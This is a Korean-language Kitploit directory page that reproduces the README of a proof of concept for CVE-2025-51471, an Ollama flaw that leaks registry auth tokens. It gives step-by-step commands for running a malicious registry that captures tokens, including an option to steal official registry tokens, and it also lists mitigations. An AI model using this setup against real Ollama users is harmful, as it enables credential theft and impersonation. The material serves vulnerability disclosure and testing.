Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-51471-POC — 이 PoC는 교육 목적 및 승인된 보안 테스트 목적으로만 사용됩니다. 소유하지 않은 시스템에 사용하지 마십시오. | Kitploit
도구/GitHubGitHub/ajtazer/cve-2025-51471-poc
Vulnerability AnalysisExploitationWeb SecurityAuthenticationRed Teaming
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

이 PoC는 교육 목적 및 승인된 보안 테스트 목적으로만 사용됩니다. 소유하지 않은 시스템에 사용하지 마십시오.

저장소 보기
27개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2025-51471 - Ollama 교차 도메인 토큰 노출 PoC

CVE-2025-51471 Ollama CVSS

작성자: ajtazer

🔥 개요

이 저장소는 Ollama의 모든 버전(최신 버전 포함)에 영향을 미치는 교차 도메인 인증 토큰 노출 취약점인 CVE-2025-51471에 대한 개념 증명(PoC)을 포함합니다.

📋 취약점 설명

Ollama가 401 Unauthorized로 응답하는 HTTPS 서버에서 모델을 가져올 때, WWW-Authenticate 헤더의 realm URL을 동일한 도메인에 속하는지 검증하지 않고 따릅니다[...]

이를 통해 공격자는 다음을 수행할 수 있습니다:

  1. 악성 "레지스트리" 서버를 설정합니다
  2. 사용자를 속여 해당 서버에서 모델을 가져오게 합니다
  3. 공격자가 제어하는 엔드포인트를 가리키는 WWW-Authenticate 헤더와 함께 401 응답을 반환합니다
  4. Ollama는 Ed25519 서명된 인증 토큰을 공격자에게 맹목적으로 전송합니다
  5. 공격자가 토큰을 캡처합니다

영향

  • registry.ollama.ai의 비공개 모델에 접근
  • 피해자의 신원으로 악성 모델을 푸시
  • Ollama 레지스트리에서 피해자를 사칭

🚀 빠른 시작

사전 요구 사항

  • Python 3.7+
  • Flask (pip install flask)
  • Ollama (모든 버전)

설치

root@kitploit:~
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask

PoC 실행

  1. 악성 레지스트리 서버를 시작합니다 (HTTP 모드):
root@kitploit:~
python3 malicious_registry.py --no-ssl
  1. 다른 터미널에서 Ollama가 실행 중인지 확인합니다:
root@kitploit:~
ollama serve
  1. 취약점을 트리거합니다:
root@kitploit:~
# curl API 사용
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# 또는 ollama CLI 사용
ollama pull --insecure localhost:8080/malicious/model
  1. 서버 터미널에서 캡처된 토큰을 확인하세요!

🎬 데모 (PoC 영상)

이 PoC를 짧은 영상으로 시연했습니다 — 여기서 시청하세요:

YouTube — PoC demo

참고 (macOS HTTPS 모드): HTTPS 모드를 사용하는 경우 생성된 인증서를 키체인에 추가하거나 --no-ssl을 사용하여 HTTP 모드를 사용하세요.

📖 사용 옵션

root@kitploit:~
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Options:
  --port, -p PORT       Port to listen on (default: 8080)
  --no-ssl              Use HTTP instead of HTTPS
  --steal-official, -s  Redirect to steal registry.ollama.ai tokens
  --no-verbose          Disable verbose output

🔧 API 엔드포인트

엔드포인트설명
/v2/*가짜 레지스트리 엔드포인트 (익스플로잇 트리거)
/v2/token토큰 캡처 엔드포인트
/tokens캡처된 모든 토큰 보기 (JSON)

🛡️ 완화 방안

  1. 신뢰할 수 있는 출처에서만 모델을 가져오세요
  2. 타사 레지스트리에서 모델을 가져올 때 주의하세요
  3. 공식 수정 사항은 PR #10750을 참조하세요

📝 크레딧

  • 작성자: ajtazer
  • 원 연구자:
    • Mohammed Benhelli (@FuzzingLabs)
    • Patrick Ventuzelo (@FuzzingLabs)
    • Huntr Report

⚠️ 면책 조항

이 PoC는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 소유하지 않은 시스템에 대해 사용하지 마십시오.


Made with ❤️ using Antigravity

도구 다운로드
/health서버 상태 확인